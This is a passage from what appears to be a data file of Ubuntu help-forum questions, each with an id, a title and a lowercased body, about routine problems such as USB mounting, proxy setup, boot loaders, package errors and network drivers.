1195.967126 ] scsi 11:0:0:0 : direct-access sandisk cruzer 1.20 pq : 0 ansi : 5 feb 19 21:05:44 lenovo kernel : [ 1195.967761 ] sd 11:0:0:0 : attached scsi generic sg3 type 0 feb 19 21:05:44 lenovo kernel : [ 1195.968812 ] sd 11:0:0:0 : [ sdc ] 125031680 512-byte logical blocks : ( 64.0 gb/59.6 gib ) feb 19 21:05:44 lenovo kernel : [ 1195.971767 ] sd 11:0:0:0 : [ sdc ] write protect is off feb 19 21:05:44 lenovo kernel : [ 1195.971777 ] sd 11:0:0:0 : [ sdc ] mode sense : 43 00 00 00 feb 19 21:05:44 lenovo kernel : [ 1195.972152 ] sd 11:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , does n't support dpo or fua feb 19 21:05:44 lenovo kernel : [ 1195.983379 ] sdc : sdc1 feb 19 21:05:44 lenovo kernel : [ 1195.985118 ] sd 11:0:0:0 : [ sdc ] attached scsi removable disk but : when i then dis- and then reconnect another usb device ( the dvd drive for instance , which is n't even mounted ) , the system almost immediately recognizes the filesytem ( s ) and mounts the drive ( s ) . syslog then ( and only then ) goes on like this : feb 19 21:06:58 lenovo udevd [ 2611 ] : timeout '/sbin/blkid -o udev -p /dev/sdc' feb 19 21:06:58 lenovo udevd [ 2611 ] : timeout 'udisks-part-id /dev/sdc' feb 19 21:06:58 lenovo ntfs-3g [ 3033 ] : version 2012.1.15ar.1 external fuse 28 feb 19 21:06:58 lenovo ntfs-3g [ 3033 ] : mounted /dev/sdc1 ( read-write , label `` cruzer64 '' , ntfs 3.1 ) feb 19 21:06:58 lenovo ntfs-3g [ 3033 ] : cmdline options : rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 feb 19 21:06:58 lenovo ntfs-3g [ 3033 ] : mount options : rw , nosuid , nodev , uhelper=udisks , allow_other , nonempty , relatime , default_permissions , fsname=/dev/sdc1 , blkdev , blksize=4096 feb 19 21:06:58 lenovo ntfs-3g [ 3033 ] : global ownership and permissions enforced , configuration type 7 any ideas on this ?
423345	how to setup system wide network proxy to get apt-get working ?	i have years of experience with windows but little time on linux . this is a basic question but i 'm not sure how it is supposed to work , thus the following question ( s ) : i 'm setting ubuntu 12.04 32 bit on a system to do some work with android . i 'm setting this up at my company behind firewalls so it ca n't seem to find the network during os install , though it installs the os successfully . my problem is that after successfully installing the os , trying to update the os or trying to get packages does n't work with it reporting failing to connect to the network locations . my process has been to install the os , then boot to the os , go to firefox preferences and configure proxies to autodetect proxy settings . i can then access websites with firefox without error . however , trying to check for updates ( using sudo apt-get updates ) or find packages i need to install like jdk runs but fails with either connection timed out or unable to connect to the locations . is this the correct process for setting the os up or what am i missing to do so ? searching for answers here talks about having a bad address which is timing out but none of the update locations ever connect over multiple attempts over multiple days , making me think i 'm missing doing something . the fact that firefox connects to the network indicates it is possible but i do n't yet know enough to do anything with that fact . any assistance is greatly appreciated .
423346	rs232 to usb not working	i have a konig rs232 serial to usb adapter ( no ftdi chip ) , but when i try to connect to a cisco switch/router ( via putty , screen , minicom ... . ) , sometimes it just shows nothing ( but it is connected because when i remove the usb it says disconnected , and sometimes it show garbage . but it also can just work ok , for about 5-10 seconds , after that it just freezes . i checked the adapter on an other linux pc ( slackware ) , and here it just works flawless . i 'm running ubuntu 13.10 ( 3-11-0-15-generic , lenovo laptop ) lsusb remy @ remy-laptop-ubuntu : ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 025 : id 0cf3:3004 atheros communications , inc . bus 001 device 032 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 001 device 003 : id 5986:0295 acer , inc bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 058f:6366 alcor micro corp. multi flash reader bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg | grep 2303 [ 22933.099512 ] pl2303 1-1.2:1.0 : device disconnected [ 22934.926969 ] usb 1-1.2 : new usb device found , idvendor=067b , idproduct=2303 [ 22934.927665 ] pl2303 1-1.2:1.0 : pl2303 converter detected [ 22934.929688 ] usb 1-1.2 : pl2303 converter now attached to ttyusb0 edit i borrowed another converter from a friend ( this one does have a ftdi chip ) , but it still does n't work . i forgot to mention that i tried it on usb 2.0 as well as 3.0 bump
423350	problem with nautilus and ubuntu 13.10	this just happened today . nautilus ( 3.8.2 ) on my ubuntu 13.10 machine used to work fine , but now , when i try to run it ( either from the icon or command line ) , it opens for about a second and then closes/crashes . the behaviour from the command line is as follows : me @ bedrock1 : ~ $ nautilus sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed ( nautilus:3388 ) : gdkpixbuf-critical ** : gdk_pixbuf_loader_close : assertion 'gdk_is_pixbuf_loader ( loader ) ' failed ( nautilus:3388 ) : gdkpixbuf-critical ** : gdk_pixbuf_loader_get_pixbuf : assertion 'gdk_is_pixbuf_loader ( loader ) ' failed sys:1 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed segmentation fault does this make any sense ? is there an easy way to see if i installed any libraries yesterday or today , that may be causing this problem ? for now , i 'm avoiding the problem by using dolphin , but am worried there 's a problem that will bite me in other applications .
423355	how do i check if a package is installed on my server ?	i recently installed ubuntu server edition 13.10 . but i have ran into a bit of problem . at the end of the install , it asks you for several extra packages whether you want them nor not , like openssh server , virtual machine host . here 's what i 'm looking at : now , my problem is that i ca n't remember if i have checked the `` virtual machine host '' checkbox . how do i check if my server has the corresponding packages ? what packages come with the virtual machine host ? thanks
423357	can i `` upgrade '' to the same version of ubuntu ?	each time i put a bootable drive in the usb slot , it asks me if i want to install it . can i use it to reinstall my os without formatting my harddrive ?
423368	does grub need to update/refresh after install windows into another hard drive ?	i have a pc with two physical disks : one of them with debian wheezy ; and the other one has one logical partition with several data and some free space . the thing is , if i install windows 7 x64 in this free space ( remember that linux is installed in the other phisical disk ) , is there any problem with grub ? does grub need to update/refresh ? or once windows finish installing , automatically grub will show me both os for booting ?
423369	geosexception error message	i am quite new to the system . another employee set up the command that i have been using and part of the return after a my usual system run query is below : file `` /usr/local/lib/python2.7/dist-packages/django/contrib/gis/geos/libgeos.py '' , line 115 , in geos_version_info if not m : raise geosexception ( 'could not parse version info string `` % s '' ' % ver ) django.contrib.gis.geos.error.geosexception : could not parse version info string `` 3.4.2-capi-1.8.2 r3921 '' i have redownloaded geos , as per another suggestion . any other recommendations ?
423373	grub rescue with windows xp	i installed ubuntu on my computer . i restarted my computer and then tried to enter windows again but i got this line that said error : unknown file system . grub rescue > and it wo n't let me proceed from that . but if i restart my computer ubuntu works perfect . so i need to know how to fix the windows xp part of my partition .
423375	my unity is disabled , and when i run compiz then it says it is	how can i get this back on ? i have tried every command reccomended for this problem but nothing works . i am running ubuntu 13.10 dual booted with windows 7 .
423377	log on hours for users	i am looking for a way to edit and enforce log on hours for individual users on a machine . so far , from what i have been able to find , 2 tools ( timekpr and gnome nanny ) arent available for use in the newer versions of ubuntu . i tired using pam and editing the time.conf file located in /etc/security/ to set log on hours for users , however , it didnt seem to work . no matter what i set , after rebooting it didnt enforce the rules that i set . how can i set log on hours for users ? are there any other programs or applications that help with this ? im using ubuntu 13.10 . also , are there any applications that allow me to manager user accounts remotely from another machine , sort of like how mmc console in windows works ?
423379	how do i know what kind of interface my wireless device uses ?	i am troubleshooting ubuntu wireless in 12.04 . the wireless guide says `` if no wireless devices are listed , the next step will depend on the type of interface your device uses . '' how can i tell what type of interface my device uses ? i am on a thinkpad dual booting into windows 8 . in windows 8 it says connection name=wifi , network adapter=2x2 11b/g/n wir transport name = \device\tcpip_somelongguidinhex
423380	receiving error : no alternatives for mozilla-flashplugin	first of all , i am very new to this and a lot of it looks like martian to me , so please take that into consideration when answering . i am trying to install chrome but i got dependency error ... i check around and saw that using the command sudo apt-get install -f might fix the issue . this is what i got when i ran it : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libgnomecups1.0-1 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up flashplugin-installer ( 11.2.202.233ubuntu2 ) ... update-alternatives : error : no alternatives for mozilla-flashplugin . dpkg : error processing flashplugin-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is there something i can do to fix this ?
423382	why are the minimize and maximize buttons `` crooked '' ?	sorry if the title is n't vere descriptive , but i do n't know how to describe this : it happens only when the windows are maximized .
423383	boot problems after uninstalling ubuntu	i have a sony vaio pc and after uninstalling ubuntu from my laptop i went into a problem that i ca n't fix . i get a error message that says : secure boot failed ! your vaio has detected an invalid operating system . i have tried to make a recovery and the only thing i get as a result is the following error message that is displayed in white text on a black background , and then i get into the same vaio care section saying the same thing again ! this appears before it enters the vaio care system : could not open `` \efi\boot\fallback.efi '' : 14 failed to open `` \efi\boot\grubx64.efi '' - 800000000000000e failed to load image failed to open `` \efi\boot\mokmanager.efi '' - 800000000000000e failed to load image i do n't know what to do . please help me . i am studying and therefore i have to use my laptop every day !
423385	how does security differ between any two standard users ?	if we take two standard users , so ignoring admin/sudos , are the security limitations between one user and another down to their respective file permissions ? so what alice can do in the system vs bob can do in the system comes down to the file permissions they have or inherit from the groups they are in ? rich
423386	is it possible to use ubuntu from a usb without installing or editing the boot menu ?	i was just wondering if it is possible to install ubuntu on a usb flash drive , and then run ubuntu from the usb without rebooting , touching the boot menu , or installing . just using it on windows 7 , from a usb . then , say the usb is removed , it goes back to windows 7 . many of you will probably ask why i would do this when i can just install it , and here 's why : i already have ubuntu installed at home , but i want to run it at school without touching anything i could get in trouble for . also , i have no administrator rights , except i do know how to use the login screen as an admin account , but i ca n't download anything . ( i enabled command prompt in the login screen in place of sticky keys , and then typed : explorer.exe to bring up the start menu , etc , ) anyway , again , i was just wondering if this is possible to do . thanks .
423392	how can i restore my desktop after updating ?	after 7 updates to ubuntu 12.04 on my pc this evening , re-start produced a black screen with grub > and a flashing cursor . how do i get the normal desktop back ?
423397	partition deleted switching from win8 to ubuntu	i have freshly switched from win8 to ubuntu 13.10 right now . but to my surprise the whole hard disk is a single partition and i can not see my old data . i used the option ' remove w8 blah blah blah ' . some people suggested to use testdisk . i have installed and running the deepsearch right now . found two of the drives . but some other people say not to run it from the same window but either from live cd or usb and then run testdisk . what are the possible options and solutions in this case .
423404	dual boot issue ubuntu and xp	i partitioned a drive and loaded ubuntu 13 on an xp machine . i am learning about the operating systems and trying to make them play together . my current boot executes as follows : system powers up , grub asks , what do you want to load , windows or ubuntu i choose ubuntu everything is good . it loads ubuntu i choose windows and it then loads the windows bootloader and asks me to choose again . windows or ubuntu ? while i realize that its a small issue to ask the question twice . its not clean so i do n't like it . i would prefer to run grub and not have windows ask me what to do , but i could also live without grub and just have the windows bootloader ask me , i really dont care . bottom line i have two bootloaders running and i only need one . i read the forums about fdisk mbr but the command is not recognized . this does n't seem like it should be a hard problem but i am striking out . any help is appreciated..
423405	broadcom 4311 wifi ubuntu 13.10	i just installed ubuntu 13.10 on my dell vostro 1000 laptop . it has the broadcom 4311 wireless . it does n't work , ubuntu software centre shows i have the bcmwl kernel source drivers and the linux firmware drivers already on . ( i noticed other questions have said the solution is to remove the former and install the latter . ) however i have no way of getting an ethernet connection , is it not possible to do it from the usb install ? if not , how will i download the packages i need from a friends laptop tomorrow ?
423406	ubuntu not in operating system list ?	i spent about an hour installing ubuntu 12.04.4-desktop-i386 from the dvd i burned . installation seemed to proceed just fine but when it finally finished and i re-booted my pc , ubuntu was n't in the operating system boot list , so my pc just booted straight into windows ! and from within windows , i could n't see my ubuntu installation at all ! i have spent another 90 minutes trying to find a solution , to no avail . so where is the ubuntu desktop i spent an hour installing and how can i boot from it please ? update : the solution seems to be to select try ubuntu instead of going directly to install ubuntu ! because when i did that and then clicked install ubuntu from inside the ubuntu live desktop , it installed perfectly : - ) now when i start or reboot my computer the ubuntu select operating system screen does come up and opens ubuntu by default . i have also booted into windows from that screen too . so it 's all working perfectly now and it even automatically detected and installed my ethernet card so i can connect to the internet too . fantastic .
423408	ubuntu 12.04 refusing to install anything	it is saying '' new software ca n't be installed , because there is a problem with the software currently installed . do you want to repair this problem now ? '' i tell it to repair it and it fails with the following details installarchives ( ) failed : ( reading database ... ( reading database ... 100 % ( reading database ... 218679 files and directories currently installed . ) unpacking libfuse2 : i386 ( from ... /libfuse2_2.9.0-1ubuntu3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libfuse2_2.9.0-1ubuntu3_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libfuse2/makefile.gz ' , which is different from other instances of package libfuse2 : i386 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libfuse2_2.9.0-1ubuntu3_i386.deb dpkg : dependency problems prevent configuration of libfuse-dev : libfuse-dev depends on libfuse2 ( = 2.9.0-1ubuntu3 ) ; however : package libfuse2 : i386 is not installed . dpkg : error processing libfuse-dev ( -- configure ) : dependency problems - leaving unconfigured anyone know how to fix this ?
423412	cpu usage - where in filesystem	there are lots of cpu usage questions appropriately answered by `` top '' etc , but i am writing my own monitoring app for one particular machine , and want to know where cpu usage details are in the filesystem of ubuntu 13.10 . in particular i want to distinguish between usage by virtualbox , and by boinc+boincmgr+4*setiathome threads , and the rest , ( ? and whatever remains uncounted ? ) . intel d2700 - 2 cores , 4 logical i can make it work , sort of , by calling top -n -1 every second from my app , and digging through the response lines for the info , but as you can see , the ticks for top , boinc ( 50 % usage ) and my app drift out of step every few minutes , so a non-top version would be much more direct :
423414	about locations of programs	where do i find the icons for a program that i wish to run ... meaning i dont know where anything is and i dont know how to start say my dvd player ... im obviously learning the os and im liking it alot but as with a windows os , the icons for any application that i want to use are either installed by default or i know where to find them ... in this case with ubuntu it installs the applications fine but it leaves no viewable icons for me and i dont know where to look to find them if i want to start up a app , and not knowing the command line at all , im kinda stuck not knowin where to find these things ... im liking ubuntu alot , so im enjoying the learning process for the new os i just need a little assistance in learning this part of it ... any help is appreciated and i thank u for listening ...
423416	prevent gnome shell for going to fallback mode	i had a glitch the other day whereby i accidentally removed myself from the sudoers file . the side effect of that appeared to be that gnome shell would not load ( which i 've been using for at least a year without problems , so it 's not a graphics card problem ) and i get dumped into fallback mode . although the original glitch is fixed , i am still stuck in gnome fallback mode . although there is a lot of advice on forcing fallback mode , i ca n't find any advice on forcing gnome shell 'full ' mode . i 've tried reinstalling , but no luck . any advice on how i can get gnome shell to work again ?
423420	getting `` the system is running in low-graphics mode '' error on boot with a dell dimension 2400	i recently installed ubuntu 12.04 on an old dell dimension 2400 desktop . the installation went fine , but now when i boot it gives me the following error message : the system is running in low-graphics mode and on the next screen i 've tried all the options , but the stubborn machine refuses to boot , and failsafex mode does n't seem to work either . windows xp still seems fine though . any help ?
423424	is a package a hybrid when its ex , version 2.0.0 really 1.8.2 ?	i knew these packages exists , i 've seen them everyware but i never understood them . i 'm not sure if they have features from the generic x.x.x ( aka version x.x.x ) or if its just really x.x.x and the version number is a lie as when you install one of these in ubuntu they appear with the `` really '' number not the version number . also it could be all the features in the `` version '' ported to a older version ( really ) and is a hybrid . i mean like here [ 1 ] they decided to go with an older version of banshee that 's based on gtk 2.xx ( for trusty ) but in my hypothesis this `` hybrid/really '' would be the gtk 2.xx based version ( 2.6.1 ) but with features from the gtk 3.xx based version ( 2.9.1 ) . so is my hypothesis correct or no ? i 'm just trying to understand these weird releases [ 1 ] https : //launchpad.net/ubuntu/trusty/+source/banshee also see : https : //launchpad.net/ubuntu/+source/banshee/2.6.1-2ubuntu1 https : //launchpad.net/ubuntu/+source/banshee/2.9.0-2ubuntu1 https : //launchpad.net/ubuntu/+source/banshee/2.9.0+really2.6.1-0ubuntu1
423425	i ca n't use libvirt with listen tcp	i ca n't figure out how to enable libvirt with '-l ' option ( -- listen ) tcp conections in ubuntu . i think that this is a bug . i tried the following , without success : https : //bugs.launchpad.net/ubuntu/+source/libvirt/+bug/557054 but libvirtd only runs with -d option . i 'm using ubuntu 13.10 . what i 'm doing wrong ? someone could help me ? http : //wiki.libvirt.org/page/libvirt_daemon_is_not_listening_on_tcp_ports_although_configured_to
423427	unable to connect to internet on ubuntu 12.04 lts	new to ubuntu , just downloaded ubuntu 12.04 lts on a dell inspiron 1010 laptop . everything was going well until i realized i couldnt access internet at all . the computer wo n't detect any wireless network , and repeatedly fails to connect to a wired connection when i plug in an ethernet cable .
423430	windows and lubuntu	i used wubi to install lubuntu on a different partition of my windows installed laptop . however after installation and subsequent restart , i do not get the option to choose the os between windows 7 and lubuntu.this is the second time i am trying this . laptop is sony vaio vgn -fj 170 - an old one on which cd-rom does not work and boot from usb option in not available . how do i get ubuntu on it ?
423432	detect network hardware non-free firmware file	during the installation of ubuntu 12.04.4 lts on a new computer build and i am getting a message that says `` some of your hardware needs non-free firmware files to operate . it says the missing firmware files are : rtl_nic/rt18168g-2.fw '' then it gives me an option to load the firmware with a usb stick . the first time i installed ubuntu 12.04.4 lts i skipped this section and after the install i noticed i was having problems shutting down and restarting my computer . i was getting a network manager fail code . i thinking this missing firmware might be related to this problem , but i 'm not sure . i 've been doing some research about this and i have found some pages for problems that are related , but i cant find a solution for this exact file . is there possibly any way to obtain this firmware file ? i have a asus z87-deluxe motherboard with two network nics installed . they are a intel 1217-v gigabit lan and a realtek 8111gr gigabit lan controller .
423434	ca n't connect to bigbluebutton from external address	i installed a bigbluebutton server ver 0.81 . when i set ip using sudo bbb-conf -- setip 192.168.0.190 it 's the local ip address and it work fine . but when i switch to my external static ip : sudo bbb-conf -- setip 118.70.177.191 then i connect to http : //118.70.177.191/ the browser ca n't connect to it . ( connect timeout ) but the link http : //118.70.177.191/bigbluebutton/api response : < response > < returncode > success < /returncode > < version > 0.81 < /version > < /response > i ca n't use the api because of connect timeout or run the demo page . plz help me resolve this problem . thanks .
423435	i disabled my user account	i accidentally disabled my user account . i 've changed the administrator password and when i reboot , the log in `` user 1 '' comes up and when i type in my password it wo n't let me log in . it says that my account is disabled and i should contact my system administrator .
423436	error installing or updating due to dpkg and linux-image-extra-3.11.0-15-generic	i have tried searching and found many articles , posts , and discussions around this error but i have yet to find anything that tells me how to fix it . i have run the following : $ sudo apt-get clean & & sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-extra-3.11.0-15-generic ( 3.11.0-15.25 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) failed to symbolic-link /boot/initrd.img-3.11.0-15-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-extra-3.11.0-15-generic.postinst line 614. dpkg : error processing linux-image-extra-3.11.0-15-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 errors were encountered while processing : linux-image-extra-3.11.0-15-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo dpkg -- configure -a setting up linux-image-extra-3.11.0-15-generic ( 3.11.0-15.25 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) failed to symbolic-link /boot/initrd.img-3.11.0-15-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-extra-3.11.0-15-generic.postinst line 614. dpkg : error processing linux-image-extra-3.11.0-15-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 errors were encountered while processing : linux-image-extra-3.11.0-15-generic $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-extra-3.11.0-15-generic ( 3.11.0-15.25 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) failed to symbolic-link /boot/initrd.img-3.11.0-15-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-extra-3.11.0-15-generic.postinst line 614. dpkg : error processing linux-image-extra-3.11.0-15-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 errors were encountered while processing : linux-image-extra-3.11.0-15-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm at a loss and do not know where to go from here . any help you could provide will be greatly appreciated .
423438	keyboard stops working after a few minutes	i have a usb keyboard ( steelseries ) which works fine on windows . but on both ubuntu 13.10 and fedora 20 it stops working after a few minutes . i 'm also using a usb mouse and it continues to work fine after the keyboard has stopped working . what can i do ?
423441	flickering screen dell xps 8700 w/ raden 7570	i just bought a used dell xps 8700 . it came without os . i am attempting to install lubuntu 13.04 . the screen flickers constantly , even when just powered on when the dell logo is onscreen . sometimes i can get to the login screen ( with much flickering ) but usually it goes to a blue/black/grey plaid sort of pattern . it is probably clear that i do n't know much so please type slowly .
423443	pipe or log apt , keeping notes	i am making a script that installs a dynamic list of packages and i need to know if a package is 'redirected ' to another packages such as rpm-dbg - > librpm-dbg . the way i was going to do that was as follows : apt-get -- no-install-recommends -- no-remove -y -- simulate install $ file > ptmp 2 > & 1 if [ [ `cat ptmp` == *note , \ selecting ] ] then file=`cat ptmp|grep note , |awk -f\ ' ' { print $ 2 ; } '` fi however i found out that by using ' > ' to dump the output into a file it acts like it had -q passed to it . i also tried ' & > ' and '|cat > ' with the same results . so what i am i missing/doing wrong ?
423445	xampp on ubuntu 13.10	i have installed xampp on ubuntu 13.10 i am running xampp from the command line by : sudo /opt/lampp/share/xampp-control-panel/xampp-control-panel rather than type this long command just to start xampp i wanted to know if there is a short cut like creating a clickable link .
423452	can i close software center while installing things ?	i am installing a few programs on my laptop , and the software center is using a lot of cpu resources . i have a few items waiting to install , and i would like to know if i can close the software center and have everything finish installing , or do the installations require the software center to be open ?
423457	unable to access external hdd in ubuntu	i have bought a new laptop lenevo g500 and installed ubuntu 13.0 , i have taken out my previous laptop 's hdd and trying to access it by connecting to usb port , however it has detected only once and after a restart it is not detecting it any more and saying unable to mount , i have checked other answers but none worked for me . can any one help please , i am getting the following error . error mounting /dev/sdc3 at /media/rinky/dharam new : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdc3 '' `` /media/rinky/dharam new '' ' exited with non-zero exit status 13 : ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 4096 usa_ofs : 7197 usa_count : 65535 : invalid argument actual vcn ( 0x800006009443600 ) of index buffer is different from expected vcn ( 0x0 ) . failed to mount '/dev/sdc3 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
423459	unstable graphics on poweredge 1850	i 've successfully installed ubuntu server on a dell poweredge 1850 but am having some problems with graphics stability . every five to ten seconds i get a screen flicker or tear . this happens even on the command line without ubuntu desktop installed . with ubuntu desktop installed , the screen ficker and tearing sometimes results in the windows disappearing and reappearing after a few seconds or just a black screen . running sudo service lightdm restart on a tty successfully restarts the interface . the weird thing is that this screen tearing and flickering happens on neither the previously installed os , red hat enterprise , nor the ubuntu install usb drive i made . so , any ideas as to how i can fix this issue ?
423460	proxy issues in ubuntu server 12.04	hi im using ubuntu server 12.04 at work . my office has two proxy servers through which i access the internet - xxx.xxx.xxx.108 and xxx.xxx.xxx.9 . i made the necessary proxy settings using xxx.xxx.xxx.108 and everything works properly . however when i use the xxx.xxx.xxx.9 i get an authentication error ( e.g while executing wget ) . please note that the credentials im supplying are absolutely correct . and using the same xxx.xxx.xxx.9 proxy and the credentials im able to access internet through firefox and chrome on a windows machine . what might be the problem ? thanks in advance !
423463	ubuntu does n't calculate expression in [ .. ] ?	i 'm a newbie to linux . i 'm reading the book linux : rute users . everything is good till i come to unit 7.1 . my script is as follow : # ! /bin/sh echo `` enter x '' read x echo `` enter y '' read y echo `` x*y = $ x* $ y = $ [ x*y ] = $ [ $ x* $ y ] '' my terminal does not give me x*y = 2*3 = 6 , instead it prints x*y = 2*3 = $ [ x*y ] = $ [ 2*3 ] i also tried the command in the terminal directly : echo `` $ [ 2*3 ] '' and it gives me 6 correctly . what is the problem with my script ? i 'm using ubuntu desktop 12.04 lts 32bit . thanks !
423465	i tried to install git in my machine but i got a error message like below ?	i tried all the possibility kindly let me know how resolve this error message and how to install git in my machine , ( personal ) root @ ubuntu : /home/shan/workspace/projects # apt-get -f install git-core reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : git-core : depends : git ( > 1:1.7.0.2 ) but it is not going to be installed mysql-server-5.5 : depends : mysql-server-core-5.5 ( = 5.5.35-0ubuntu0.12.04.1 ) but 5.5.35-0ubuntu0.12.04.2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
423466	install ubuntu on android tablet and nuke android os	i have a android table with a 1.7ghz processor and 512mb ram i want to nuke android and install whatever version of ubuntu would run smoothly in these conditions . anybody got a step by step on this . must still be able to use my bluetooth keyboard and mouse and the usb port .
423467	bring up multiple instances of program upon click	i seem to be having a strange problem with ubuntu 12.04 on my laptop . i also use ubuntu on my desktop and it works fine in that if i click the icon of a program and i have multiple instances of it running , it brings up a screen where i can choose which instance of the program i want to use . however , this does n't work on my laptop since if i do that , i can only bring up the previous instance of the program ( although it used to be able to do it ) . i ca n't get around this problem using the super button but can anyone explain and/or fix this ?
423471	best way to burn data to dvd using command line	i have three kinds of file : iso file , directory , txt file , iso : debian7.iso directory : archives from /var/cache/apt/archives file : readme i want to burn them into a dvd using command line ... note : i do n't want my iso file be extracted what i tried is : sudo wodim dev=/dev/dvdrw -v -data /path/to/debian7-64bits/ but is gives me errors what is the best way to do that ? thanks
423474	need to install ubuntu on uefi windows 8 pc	i am typing this from a window $ $ $ 8 laptop . it is a dirt cheap acer e1 series and is fairly new . i want to erase windows completely from this laptop and put only ubuntu 32 bit on it . i see that the bios is uefi and there can be some issues in installing ubuntu . so , i want to educate myself properly before i try this . is there a well tested guide for installing ubuntu over windows 8 , in a uefi pc ? i do n't want dual boot . i want windows out of my laptop . also , i might install more flavors of linux alongside ubuntu later . thanks in advance .
423476	how do i d/l qbittorrent at the unbutu app site ?	i see no download button . i submitted my email but it just linked me back to the same app page .
423482	lspci shows network card as bridge - can not connect to router	i 'm using ubuntu 13.10 - after kernel update and reboot my network stopped working . after spending a day trying to figure it out here is what i know . lshw shows ethernet as class `` bridge '' and same for lspci . lshw output /0/5 multimedia mcp61 high definition audio /0/6 storage mcp61 ide /0/7 eth0 bridge mcp61 ethernet /0/8 storage mcp61 sata controller /0/8.1 storage mcp61 sata controller /0/9 bridge mcp61 pci express bridge /0/9/0 display gt218 [ geforce 210 ] /0/9/0.1 multimedia high definition audio controller lspci output 00:00.0 ram memory : nvidia corporation mcp61 host bridge ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) i can see eth0 but it has problems getting ip from router if ip is from dhcp . when i assign static ip the icon shows it 's connected but i ca n't ping the router . however i can ping my phone ip . ifconfig -a output eth0 link encap : ethernet hwaddr bc:5f : f4:31 : a5 : c4 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:80:48:15 : c3:41 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :280:48ff : fe15 : c341/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:577492 errors:0 dropped:0 overruns:0 frame:0 tx packets:544688 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:567924020 ( 567.9 mb ) tx bytes:252055711 ( 252.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4573 errors:0 dropped:0 overruns:0 frame:0 tx packets:4573 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:464004 ( 464.0 kb ) tx bytes:464004 ( 464.0 kb ) i think it has to do with my network card not showing as networking device but i do n't know if it connected to upgrade or if it 's hardware issue . i tried to boot from 